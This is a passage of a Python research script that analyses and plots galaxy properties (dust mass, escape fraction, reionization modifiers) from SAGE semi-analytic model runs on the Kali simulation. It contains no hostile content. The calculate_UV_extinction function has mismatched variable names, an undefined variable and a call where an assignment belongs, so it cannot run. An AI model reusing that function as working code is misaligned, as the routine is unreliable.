t_plot = (AllVars.t_BigBang - cosmo.lookback_time(PlotScripts.z_plot).value) * 1.0e3 # Corresponding Time values on the bottom.
z_labels = ["$\mathbf{%d}$" % x for x in PlotScripts.z_plot] # Properly Latex-ize the labels.
ax11.set_xlabel(r"$\mathbf{z}$", fontsize = PlotScripts.global_labelsize)
ax11.set_xlim(PlotScripts.time_xlim)
ax11.set_xticks(t_plot) # Set the ticks according to the time values on the bottom,
ax11.set_xticklabels(z_labels, fontsize = PlotScripts.global_fontsize) # But label them as redshifts.
leg = ax10.legend(loc='lower right', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
outputFile2 = "./{0}_z{1}".format(output_tag, output_format)
fig2.savefig(outputFile2, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile2))
plt.close(fig2)
##
def plot_dust(PlotSnapList, SnapList, simulation_norm, mean_dust_galaxy, std_dust_galaxy,
N_galaxy, mean_dust_halo, std_dust_halo, N_halo, plot_z,
model_tags, output_tag):
"""
"""
master_mean_dust_galaxy, master_std_dust_galaxy, master_N_dust_galaxy, master_bin_middle_galaxy = \
collect_across_tasks(mean_dust_galaxy, std_dust_galaxy, N_galaxy, SnapList,
PlotSnapList, True, m_gal_low, m_gal_high)
master_mean_dust_halo, master_std_dust_halo, master_N_dust_halo, master_bin_middle_halo = \
collect_across_tasks(mean_dust_halo, std_dust_halo, N_halo, SnapList,
PlotSnapList, True, m_low, m_high)
if rank == 0:
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
fig2 = plt.figure()
ax2 = fig2.add_subplot(111)
for model_number in range(len(PlotSnapList)):
if(simulation_norm[model_number] == 1):
cosmo = AllVars.Set_Params_MiniMill()
elif(simulation_norm[model_number] == 3):
cosmo = AllVars.Set_Params_Tiamat_extended()
elif(simulation_norm[model_number] == 4):
cosmo = AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
cosmo = AllVars.Set_Params_Kali()
for snapshot_idx in range(len((PlotSnapList[model_number]))):
if snapshot_idx == 0:
label = model_tags[model_number]
else:
label = ""
nonzero_bins = np.where(master_N_dust_galaxy[model_number][snapshot_idx] > 0.0)[0]
ax1.plot(master_bin_middle_galaxy[model_number][snapshot_idx][nonzero_bins],
master_mean_dust_galaxy[model_number][snapshot_idx][nonzero_bins],
label = label, ls = PlotScripts.linestyles[model_number],
color = PlotScripts.colors[snapshot_idx])
nonzero_bins = np.where(master_N_dust_halo[model_number][snapshot_idx] > 0.0)[0]
ax2.plot(master_bin_middle_halo[model_number][snapshot_idx][nonzero_bins],
master_mean_dust_halo[model_number][snapshot_idx][nonzero_bins],
label = label, ls = PlotScripts.linestyles[model_number],
color = PlotScripts.colors[snapshot_idx])
print(master_mean_dust_halo[model_number][snapshot_idx])
for count, snapshot_idx in enumerate(PlotSnapList[model_number]):
#label = r"$\mathbf{z = " + str(int(round(AllVars.SnapZ[snapshot_idx]))) + "}$"
label = r"$\mathbf{z = " + str(AllVars.SnapZ[snapshot_idx]) + "}$"
ax1.plot(np.nan, np.nan, ls = PlotScripts.linestyles[0], color =
PlotScripts.colors[count], label = label)
ax2.plot(np.nan, np.nan, ls = PlotScripts.linestyles[0], color =
PlotScripts.colors[count], label = label)
ax1.set_xlim([2.0, 10.5])
#ax1.set_ylim([1.0, 6.0])
ax1.set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$', fontsize = PlotScripts.global_labelsize)
ax1.set_ylabel(r'$\mathbf{log_{10} \: \langle M_{Dust}\rangle_{M*}}$', fontsize = PlotScripts.global_labelsize)
leg = ax1.legend(loc='upper left', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
outputFile1 = "./{0}_galaxy{1}".format(output_tag, output_format)
fig1.savefig(outputFile1, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile1))
plt.close(fig1)
ax2.set_xlim([6.8, 11.5])
#ax2.set_ylim([1.0, 6.0])
ax2.set_xlabel(r'$\mathbf{log_{10} \: M_{vir} \:[M_{\odot}]}$', fontsize = PlotScripts.global_labelsize)
ax2.set_ylabel(r'$\mathbf{log_{10} \: \langle M_{Dust}\rangle_{Mvir}}$', fontsize = PlotScripts.global_labelsize)
leg = ax2.legend(loc='upper left', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
outputFile2 = "./{0}_halo{1}".format(output_tag, output_format)
fig2.savefig(outputFile2, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile2))
plt.close(fig2)
def plot_dust_scatter(SnapList, mass_gal, mass_halo, mass_dust, output_tag):
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
fig2 = plt.figure()
ax2 = fig2.add_subplot(111)
fig3 = plt.figure()
ax3 = fig3.add_subplot(111, projection='3d')
fig4 = plt.figure()
ax4 = fig4.add_subplot(111)
ax1.scatter(mass_gal, mass_dust)
ax2.scatter(mass_halo, mass_dust)
#ax3.scatter(mass_gal, mass_halo, mass_dust)
hb = ax4.hexbin(mass_halo, mass_dust, bins='log', cmap='inferno')
ax1.set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$', fontsize = PlotScripts.global_labelsize)
ax1.set_ylabel(r'$\mathbf{log_{10} \: M_{Dust}}$', fontsize = PlotScripts.global_labelsize)
ax2.set_xlabel(r'$\mathbf{log_{10} \: M_{vir} \:[M_{\odot}]}$', fontsize = PlotScripts.global_labelsize)
ax2.set_ylabel(r'$\mathbf{log_{10} \: M_{Dust}}$', fontsize = PlotScripts.global_labelsize)
ax4.set_xlabel(r'$\mathbf{log_{10} \: M_{vir} \:[M_{\odot}]}$', fontsize = PlotScripts.global_labelsize)
ax4.set_ylabel(r'$\mathbf{log_{10} \: M_{Dust}}$', fontsize = PlotScripts.global_labelsize)
cb = fig4.colorbar(hb, ax=ax4)
cb.set_label('log10(N)')
outputFile1 = "./{0}_galaxy{1}".format(output_tag, output_format)
fig1.savefig(outputFile1, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile1))
plt.close(fig1)
outputFile2 = "./{0}_halo{1}".format(output_tag, output_format)
fig2.savefig(outputFile2, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile2))
plt.close(fig2)
#outputFile3 = "./{0}_3D{1}".format(output_tag, output_format)
#fig3.savefig(outputFile3, bbox_inches='tight') # Save the figure
#print('Saved file to {0}'.format(outputFile3))
#plt.close(fig3)
outputFile4 = "./{0}_hexbin{1}".format(output_tag, output_format)
fig4.savefig(outputFile4, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile4))
plt.close(fig4)
### Here ends the plotting functions. ###
### Here begins the functions that calculate various properties for the galaxies (fesc, Magnitude etc). ###
def Calculate_HaloPartStellarMass(halo_part, stellar_mass, bound_low, bound_high):
'''
Calculates the stellar mass for galaxies whose host halos contain a specified number of particles.
Parameters
----------
halo_part : array
Array containing the number of particles inside each halo.
stellar_mass : array
Array containing the Stellar Mass for each galaxy (entries align with HaloPart). Units of log10(Msun).
bound_low, bound_high : int
We calculate the Stellar Mass of galaxies whose host halo has, bound_low <= halo_part <= bound_high.
Return
-----
mass, mass_std : float
Mean and standard deviation stellar mass of galaxies whose host halo has number of particles between the specified bounds. Units of log10(Msun)
Units
-----
Input Stellar Mass is in units of log10(Msun).
Output mean/std Stellar Mass is in units of log10(Msun).
'''
w = np.where((halo_part >= bound_low) & (halo_part <= bound_high))[0] # Find the halos with particle number between the bounds.
mass = np.mean(10**(stellar_mass[w]))
mass_std = np.std(10**(stellar_mass[w]))
return np.log10(mass), np.log10(mass_std)
##
def calculate_UV_extinction(z, L, M):
'''
Calculates the observed UV magnitude after dust extinction is accounted for.
Parameters
----------
z : float
Redshift we are calculating the extinction at.
L, M : array, length equal to the number of galaxies at this snapshot.
Array containing the UV luminosities and magnitudes.
Returns
-------
M_UV_obs : array, length equal to the number of galaxies at this snapshot.
Array containing the observed UV magnitudes.
Units
-----
Luminosities are in units of log10(erg s^-1 A^-1).
Magnitudes are in the AB system.
'''
M_UV_bins = np.arange(-24, -16, 0.1)
A_mean = np.zeros((len(MUV_bins))) # A_mean is the average UV extinction for a given UV bin.
for j in range(0, len(M_UV_bins)):
beta = calculate_beta(M_UV_bins[j], AllVars.SnapZ[current_snap]) # Fits the beta parameter for the current redshift/UV bin.
dist = np.random.normal(beta, 0.34, 10000) # Generates a normal distribution with mean beta and standard deviation of 0.34.
A = 4.43 + 1.99*dist
A[A < 0] = 0 # Negative extinctions don't make sense.
A_Mean[j] = np.mean(A)
indices = np.digitize(M, M_UV_bins) # Bins the simulation magnitude into the MUV bins. Note that digitize defines an index i if bin[i-1] <= x < bin[i] whereas I prefer bin[i] <= x < bin[i+1]
dust = A_Mean[indices]
flux = AllVars.Luminosity_to_Flux(L, 10.0) # Calculate the flux from a distance of 10 parsec, units of log10(erg s^-1 A^-1 cm^-2).
flux_observed = flux - 0.4*dust
f_nu = ALlVars.spectralflux_wavelength_to_frequency(10**flux_observed, 1600) # Spectral flux desnity in Janksy.
M_UV_obs(-2.5 * np.log10(f_nu) + 8.90) # AB Magnitude from http://www.astro.ljmu.ac.uk/~ikb/convert-units/node2.html
return M_UV_obs
##
def update_cumulative_stats(mean_pool, std_pool, N_pool, mean_local, std_local, N_local):
'''
Update the cumulative statistics (such as Stellar Mass Function, Mvir-Ngamma, fesc-z) that are saved across files.
Pooled mean formulae taken : from https://www.ncbi.nlm.nih.gov/books/NBK56512/
Pooled variance formulae taken from : https://en.wikipedia.org/wiki/Pooled_variance
Parameters
----------
mean_pool, std_pool, N_pool : array of floats with length equal to the number of bins (e.g. the mass bins for the Stellar Mass Function).
The current mean, standard deviation and number of data points within in each bin. This is the array that will be updated in this function.
mean_local, std_local, N_local : array of floats with length equal to the number of bins.
The mean, standard deviation and number of data points within in each bin that will be added to the pool.
Returns
-------
mean_pool, std_pool, N_pool : (See above)
The updated arrays with the local values added and accounted for within the pools.
Units
-----
All units are kept the same as the input units.
Values are in real-space (not log-space).
'''
N_times_mean_local = np.multiply(N_local, mean_local)
N_times_var_local = np.multiply(N_local - 1, np.multiply(std_local, std_local)) # Actually N - 1 because of Bessel's Correction
# https://en.wikipedia.org/wiki/Bessel%27s_correction). #
N_times_mean_pool = np.add(N_times_mean_local, np.multiply(N_pool, mean_pool))
N_times_var_pool = np.add(N_times_var_local, np.multiply(N_pool - 1, np.multiply(std_pool, std_pool)))
N_pool = np.add(N_local, N_pool)
'''
print(mean_local)
print(type(mean_local))
print((type(mean_local).__module__ == np.__name__))
print(isinstance(mean_local, list))
print(isinstance(mean_local,float64))
print(isinstance(mean_local,float32))
'''
if (((type(mean_local).__module__ == np.__name__) == True or (isinstance(mean_local, list) == True)) and isinstance(mean_local, float) == False and isinstance(mean_local, int) == False and isinstance(mean_local,float32) == False and isinstance(mean_local, float64) == False): # Checks to see if we are dealing with arrays.
for i in range(0, len(N_pool)):
if(N_pool[i] == 0): # This case is when we have no data points in the bin.
mean_pool[i] = 0.0
else:
mean_pool[i] = N_times_mean_pool[i]/N_pool[i]
if(N_pool[i] < 3): # In this instance we don't have enough data points to properly calculate the standard deviation.
std_pool[i] = 0.0
else:
std_pool[i] = np.sqrt(N_times_var_pool[i]/ (N_pool[i] - 2)) # We have -2 because there is two instances of N_pool contains two 'N - 1' terms.
else:
mean_pool = N_times_mean_pool / N_pool
if(N_pool < 3):
std_pool = 0.0
else:
std_pool = np.sqrt(N_times_var_pool / (N_pool - 2))
return mean_pool, std_pool
### Here ends the functions that deal with galaxy data manipulation. ###
#################################
if __name__ == '__main__':
np.seterr(divide='ignore')
number_models = 4
galaxies_model1="/fred/oz004/jseiler/kali/self_consistent_output/rsage_constant/galaxies/const_0.3_z5.782"
merged_galaxies_model1="/fred/oz004/jseiler/kali/self_consistent_output/rsage_constant/galaxies/const_0.3_MergedGalaxies"
photo_model1="/fred/oz004/jseiler/kali/self_consistent_output/rsage_constant/grids/cifog/const_0.3_photHI"
zreion_model1="/fred/oz004/jseiler/kali/self_consistent_output/rsage_constant/grids/cifog/const_0.3_reionization_redshift"
galaxies_model2="/fred/oz004/jseiler/kali/self_consistent_output/rsage_fej/galaxies/fej_alpha0.40_beta0.05_z5.782"
merged_galaxies_model2="/fred/oz004/jseiler/kali/self_consistent_output/rsage_fej/galaxies/fej_alpha0.40_beta0.05_MergedGalaxies"
photo_model2="/fred/oz004/jseiler/kali/self_consistent_output/rsage_fej/grids/cifog/fej_alpha0.40_beta0.05_photHI"
zreion_model2="/fred/oz004/jseiler/kali/self_consistent_output/rsage_fej/grids/cifog/fej_alpha0.40_beta0.05_reionization_redshift"
galaxies_model3="/fred/oz004/jseiler/kali/self_consistent_output/rsage_MHneg/galaxies/MHneg_1e8_1e12_0.99_0.05_z5.782"
merged_galaxies_model3="/fred/oz004/jseiler/kali/self_consistent_output/rsage_MHneg/galaxies/MHneg_1e8_1e12_0.99_0.05_MergedGalaxies"
photo_model3="/fred/oz004/jseiler/kali/self_consistent_output/rsage_MHneg/grids/cifog/MHneg_1e8_1e12_0.99_0.05_photHI"
zreion_model3="/fred/oz004/jseiler/kali/self_consistent_output/rsage_MHneg/grids/cifog/MHneg_1e8_1e12_0.99_0.05_reionization_redshift"
galaxies_model4="/fred/oz004/jseiler/kali/self_consistent_output/rsage_MHpos/galaxies/MHpos_1e8_1e12_0.01_0.50_z5.782"
merged_galaxies_model4="/fred/oz004/jseiler/kali/self_consistent_output/rsage_MHpos/galaxies/MHpos_1e8_1e12_0.01_0.50_MergedGalaxies"
photo_model4="/fred/oz004/jseiler/kali/self_consistent_output/rsage_MHpos/grids/cifog/MHpos_1e8_1e12_0.01_0.50_photHI"
zreion_model4="/fred/oz004/jseiler/kali/self_consistent_output/rsage_MHpos/grids/cifog/MHpos_1e8_1e12_0.01_0.50_reionization_redshift"
galaxies_filepath_array = [galaxies_model1,
galaxies_model2,
galaxies_model3,
galaxies_model4]
photo_array = [photo_model1,
photo_model2,
photo_model3,
photo_model4]
zreion_array = [zreion_model1,
zreion_model2,
zreion_model3,
zreion_model4]
GridSize_array = [256,
256,
256,
256]
precision_array = [2,
2,
2,
2]
merged_galaxies_filepath_array = [merged_galaxies_model1,
merged_galaxies_model2,
merged_galaxies_model3,
merged_galaxies_model4]
number_substeps = [10, 10, 10, 10] # How many substeps does each model have (specified by STEPS variable within SAGE).
number_snapshots = [99, 99, 99, 99] # Number of snapshots in the simulation (we don't have to do calculations for ALL snapshots).
# Tiamat extended has 164 snapshots.
FirstFile = [0, 0, 0, 0] # The first file number THAT WE ARE PLOTTING.
#LastFile = [63, 63, 63, 63] # The last file number THAT WE ARE PLOTTING.
LastFile = [0, 0, 0, 0] # The last file number THAT WE ARE PLOTTING.
NumFile = [64, 64, 64, 64] # The number of files for this simulation (plotting a subset of these files is allowed).
same_files = [0, 0, 0, 0] # In the case that model 1 and model 2 (index 0 and 1) have the same files, we don't want to read them in a second time.
# This array will tell us if we should keep the files for the next model or otherwise throw them away.
# The files will be kept until same_files[current_model_number] = 0.
# For example if we had 5 models we were plotting and model 1, 2, 3 shared the same files and models 4, 5 shared different files,
# Then same_files = [1, 1, 0, 1, 0] would be the correct values.
done_model = np.zeros((number_models)) # We use this to keep track of if we have done a model already.
model_tags = [r"$\mathbf{f_\mathrm{esc} \: Constant}$",
r"$\mathbf{f_\mathrm{esc} \: \propto \: f_\mathrm{ej}}$",
r"$\mathbf{f_\mathrm{esc} \: \propto \: M_\mathrm{H}^{-1}}$",
r"$\mathbf{f_\mathrm{esc} \: \propto \: M_\mathrm{H}}$"]
## Constants used for each model. ##
# Need to add an entry for EACH model. #
halo_cut = [32, 32, 32, 32] # Only calculate properties for galaxies whose host halos have at least this many particles.
# For Tiamat, z = [6, 7, 8] are snapshots [78, 64, 51]
# For Kali, z = [6, 7, 8] are snapshots [93, 76, 64]
#SnapList = [np.arange(0,99), np.arange(0,99)] # These are the snapshots over which the properties are calculated. NOTE: If the escape fraction is selected (fesc_prescription == 3) then this should be ALL the snapshots in the simulation as this prescriptions is temporally important.
#SnapList = [np.arange(20,99), np.arange(20, 99), np.arange(20, 99)]
SnapList = [[33, 50, 76, 93],
[33, 50, 76, 93],
[33, 50, 76, 93],
[33, 50, 76, 93]]
#SnapList = [[64],
# [64],
# [64],
# [64]]
#SnapList = [[33, 50, 64, 76, 93]]
#SnapList = [[64], [64]]
#SnapList = [np.arange(20,99)]
#PlotSnapList = [[30, 50, 64, 76, 93]]
#PlotSnapList = [[93, 76, 64], [93, 76, 64]]
#SnapList = [[93, 76, 64], [93, 76, 64]]
PlotSnapList = SnapList
simulation_norm = [5, 5, 5, 5] # Changes the constants (cosmology, snapshot -> redshift mapping etc) for each simulation.
# 0 for MySim (Manodeep's old one).
# 1 for Mini-Millennium.
# 2 for Tiamat (up to z =5).
# 3 for extended Tiamat (down to z = 1.6ish).
# 4 for Britton's Sim Pip
# 5 for Manodeep's new simulation Kali.
stellar_mass_halolen_lower = [32, 95, 95, 95] # These limits are for the number of particles in a halo.
stellar_mass_halolen_upper = [50, 105, 105, 105] # We calculate the average stellar mass for galaxies whose host halos have particle count between these limits.
calculate_observed_LF = [0, 0, 0, 0] # Determines whether we want to account for dust extinction when calculating the luminosity function of each model.
paper_plots = 1
##############################################################################################################
## Do a few checks to ensure all the arrays were specified properly. ##
for model_number in range(0,number_models):
assert(LastFile[model_number] - FirstFile[model_number] + 1 >= size)
if(simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif(simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
elif(simulation_norm[model_number] == 4):
AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
AllVars.Set_Params_Kali()
else:
print("Simulation norm was set to {0}.".format(simulation_norm[model_number]))
raise ValueError("This option has been implemented yet. Get your head in the game Jacob!")
if (number_snapshots[model_number] != len(AllVars.SnapZ)): # Here we do a check to ensure that the simulation we've defined correctly matches the number of snapshots we have also defined.
print("The number_snapshots array is {0}".format(number_snapshots))
print("The simulation_norm array is {0}".format(simulation_norm))
print("The number of snapshots for model_number {0} has {1} but you've said there is only {2}".format(model_number, len(AllVars.SnapZ), number_snapshots[model_number]))
raise ValueError("Check either that the number of snapshots has been defined properly and that the normalization option is correct.")
######################################################################
##################### SETTING UP ARRAYS ##############################
######################################################################
### The arrays are set up in a 3 part process. ###
### This is because our arrays are 3D nested to account for the model number and snapshots. ###
# First set up the outer most array. #
## Arrays for functions of stellar mass. ##
SMF = [] # Stellar Mass Function.
mean_fesc_galaxy_array = [] # Mean escape fraction as a function of stellar mass.
std_fesc_galaxy_array = [] # Same as above but standard devation.
N_galaxy_array = [] # Number of galaxies as a function of stellar mass.
mean_BHmass_galaxy_array = [] # Black hole mass as a function of stellar mass.
std_BHmass_galaxy_array = [] # Same as above but standard deviation.
mergers_galaxy_array = [] # Number of mergers as a function of halo mass.
mean_dust_galaxy_array = [] # Mean dust mass as a function of stellar mass.
std_dust_galaxy_array = [] # Same as above but standard deviation.
mean_sfr_galaxy_array = [] # Mean star formation rate as a
# function of stellar mass
std_sfr_galaxy_array = [] # Same as above but standard deviation.
mean_ssfr_galaxy_array = [] # Mean specific star formation rate as a
# function of stellar mass
std_ssfr_galaxy_array = [] # Same as above but standard deviation.
mean_Ngamma_galaxy_array = [] # Mean number of ionizing photons emitted as
# a function of stellar mass.
std_Ngamma_galaxy_array = [] # Same as above but standard deviation.
mean_photo_galaxy_array = [] # Mean photoionization rate.
std_photo_galaxy_array = [] # Std photoionization rate.
mean_reionmod_galaxy_array = [] # Mean reionization modifier using RSAGE.
std_reionmod_galaxy_array = [] # Std.
mean_gnedin_reionmod_galaxy_array = [] # Mean reionization modifier using Gnedin analytic prescription.
std_gnedin_reionmod_galaxy_array = [] # Std.
## Arrays for functions of halo mass. ##
mean_ejected_halo_array = [] # Mean ejected fractions as a function of halo mass.
std_ejected_halo_array = [] # Same as above but standard deviation.
mean_fesc_halo_array = [] # Mean escape fraction as a function of halo mass.
std_fesc_halo_array = [] # Same as above but standard deviation.
mean_Ngamma_halo_array = [] # Mean number of ionizing photons THAT ESCAPE as a function of halo mass.
std_Ngamma_halo_array = [] # Same as above but standard deviation.
N_halo_array = [] # Number of galaxies as a function of halo mass.
mergers_halo_array = [] # Number of mergers as a function of halo mass.
mean_quasar_activity_array = [] # Mean fraction of galaxies that have quasar actvitity as a function of halo mas.
std_quasar_activity_array = [] # Same as above but standard deviation.
mean_reionmod_halo_array = [] # Mean reionization modifier as a function of halo mass.
std_reionmod_halo_array = [] # Same as above but for standard deviation.
mean_dust_halo_array = [] # Mean dust mass as a function of halo mass.
std_dust_halo_array = [] # Same as above but standard deviation.
## Arrays for functions of redshift. ##
sum_Ngamma_z_array = [] # Total number of ionizing photons THAT ESCAPE as a functio of redshift.
mean_fesc_z_array = [] # Mean number of ionizing photons THAT ESCAPE as a function of redshift.
std_fesc_z_array = [] # Same as above but standard deviation.
N_z = [] # Number of galaxies as a function of redshift.
galaxy_halo_mass_mean = [] # Mean galaxy mass as a function of redshift.
N_quasars_z = [] # This tracks how many quasars went off during a specified snapshot.
N_quasars_boost_z = [] # This tracks how many galaxies are having their escape fraction boosted by quasar activity.
dynamicaltime_quasars_mean_z = [] # Mean dynamical time of galaxies that have a quasar event as a function of redshift.
dynamicaltime_quasars_std_z = [] # Same as above but standard deviation.
dynamicaltime_all_mean_z = [] # Mean dynamical time of all galaxies.
dynamicaltime_all_std_z = [] # Same as above but standard deviation.
mean_reionmod_z = [] # Mean reionization modifier as a function of redshift.
std_reionmod_z = [] # Same as above but for standard deviation.
N_reionmod_z = [] # Number of galaxies with a non-negative reionization modifier.
mean_ejected_z = [] # Mean ejected fraction as a function of redshift.
std_ejected_z = [] # Same as above but for standard deviation.
## Arrays that aren't functions of other variables. ##
Ngamma_global = []
mass_global = []
fesc_global = []
## Arrays as a function of fej ##
mean_Ngamma_fej = []
std_Ngamma_fej = []
N_fej = []
## Now the outer arrays have been defined, set up the next nest level for the number of models. ##
for model_number in range(0,number_models):
## Galaxy Arrays ##
SMF.append([])
mean_fesc_galaxy_array.append([])
std_fesc_galaxy_array.append([])
N_galaxy_array.append([])
mean_BHmass_galaxy_array.append([])
std_BHmass_galaxy_array.append([])
mergers_galaxy_array.append([])
mean_dust_galaxy_array.append([])
std_dust_galaxy_array.append([])
mean_sfr_galaxy_array.append([])
std_sfr_galaxy_array.append([])
mean_ssfr_galaxy_array.append([])
std_ssfr_galaxy_array.append([])
mean_Ngamma_galaxy_array.append([])
std_Ngamma_galaxy_array.append([])
mean_photo_galaxy_array.append([])
std_photo_galaxy_array.append([])
mean_reionmod_galaxy_array.append([])
std_reionmod_galaxy_array.append([])
mean_gnedin_reionmod_galaxy_array.append([])
std_gnedin_reionmod_galaxy_array.append([])
## Halo arrays. ##
mean_ejected_halo_array.append([])
std_ejected_halo_array.append([])
mean_fesc_halo_array.append([])
std_fesc_halo_array.append([])
mean_Ngamma_halo_array.append([])
std_Ngamma_halo_array.append([])
N_halo_array.append([])
mergers_halo_array.append([])
mean_quasar_activity_array.append([])
std_quasar_activity_array.append([])
mean_reionmod_halo_array.append([])
std_reionmod_halo_array.append([])
mean_dust_halo_array.append([])
std_dust_halo_array.append([])
## Redshift arrays. ##
sum_Ngamma_z_array.append([])
mean_fesc_z_array.append([])
std_fesc_z_array.append([])
N_z.append([])
galaxy_halo_mass_mean.append([])
N_quasars_z.append([])
N_quasars_boost_z.append([])
dynamicaltime_quasars_mean_z.append([])
dynamicaltime_quasars_std_z.append([])
dynamicaltime_all_mean_z.append([])
dynamicaltime_all_std_z.append([])
mean_reionmod_z.append([])
std_reionmod_z.append([])
N_reionmod_z.append([])
mean_ejected_z.append([])
std_ejected_z.append([])
## Arrays that aren't functions ##
Ngamma_global.append([])
mass_global.append([])
fesc_global.append([])
## Arrays as a function of fej ##
mean_Ngamma_fej.append([])
std_Ngamma_fej.append([])
N_fej.append([])
## And then finally set up the inner most arrays ##
## NOTE: We do the counts as float so we can keep consistency when we're calling MPI operations (just use MPI.FLOAT rather than deciding if we need to use MPI.INT)
for snapshot_idx in range(len(SnapList[model_number])):
## For the arrays that are functions of stellar/halo mass, the inner most level will be an array with the statistic binned across mass ##
## E.g. SMF[model_number][snapshot_idx] will return an array whereas N_z[model_number][snapshot_idx] will return a float. ##
## Functions of stellar mass arrays. ##
SMF[model_number].append(np.zeros((NB_gal), dtype = np.float32))
mean_fesc_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
std_fesc_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
N_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
mean_BHmass_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
std_BHmass_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
mergers_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
mean_dust_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
std_dust_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
mean_sfr_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
std_sfr_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
mean_ssfr_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
std_ssfr_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
mean_Ngamma_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
std_Ngamma_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
mean_photo_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
std_photo_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
mean_reionmod_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
std_reionmod_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
mean_gnedin_reionmod_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
std_gnedin_reionmod_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
## Function of halo mass arrays. ##
mean_ejected_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
std_ejected_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
mean_fesc_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
std_fesc_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
mean_Ngamma_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
std_Ngamma_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
N_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
mergers_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
mean_quasar_activity_array[model_number].append(np.zeros((NB), dtype = np.float32))
std_quasar_activity_array[model_number].append(np.zeros((NB), dtype = np.float32))
mean_reionmod_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
std_reionmod_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
mean_dust_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
std_dust_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
## Function of Redshift arrays. ##
sum_Ngamma_z_array[model_number].append(0.0)
mean_fesc_z_array[model_number].append(0.0)
std_fesc_z_array[model_number].append(0.0)
N_z[model_number].append(0.0)
galaxy_halo_mass_mean[model_number].append(0.0)
N_quasars_z[model_number].append(0.0)
N_quasars_boost_z[model_number].append(0.0)
dynamicaltime_quasars_mean_z[model_number].append(0.0)
dynamicaltime_quasars_std_z[model_number].append(0.0)
dynamicaltime_all_mean_z[model_number].append(0.0)
dynamicaltime_all_std_z[model_number].append(0.0)
mean_reionmod_z[model_number].append(0.0)
std_reionmod_z[model_number].append(0.0)
N_reionmod_z[model_number].append(0.0)
mean_ejected_z[model_number].append(0.0)
std_ejected_z[model_number].append(0.0)
Ngamma_global[model_number].append([])
mass_global[model_number].append([])
fesc_global[model_number].append([])
## Arrays as a function of fej. ##
mean_Ngamma_fej[model_number].append(np.zeros((NB_fej), dtype = np.float32))
std_Ngamma_fej[model_number].append(np.zeros((NB_fej), dtype = np.float32))
N_fej[model_number].append(np.zeros((NB_fej), dtype = np.float32))
######################################################################
#################### ALL ARRAYS SETUP ################################
######################################################################
## Now it's (finally) time to read in all the data and do the actual work. ##
for model_number in range(number_models):
if(simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif(simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
elif(simulation_norm[model_number] == 4):
AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
AllVars.Set_Params_Kali()
else:
print("Simulation norm was set to {0}.".format(simulation_norm[model_number]))
raise ValueError("This option has been implemented yet. Get your head in the game Jacob!")
if (done_model[model_number] == 1): # If we have already done this model (i.e., we kept the files and skipped this loop), move along.
assert(FirstFile[model_number] == FirstFile[model_number - 1])
assert(LastFile[model_number] == LastFile[model_number - 1])
continue
for fnr in range(FirstFile[model_number] + rank, LastFile[model_number]+1, size): # Divide up the input files across the processors.
GG, Gal_Desc = ReadScripts.ReadGals_SAGE(galaxies_filepath_array[model_number], fnr, number_snapshots[model_number], comm) # Read galaxies
G_Merged, _ = ReadScripts.ReadGals_SAGE(merged_galaxies_filepath_array[model_number], fnr, number_snapshots[model_number], comm) # Also need the merged galaxies.
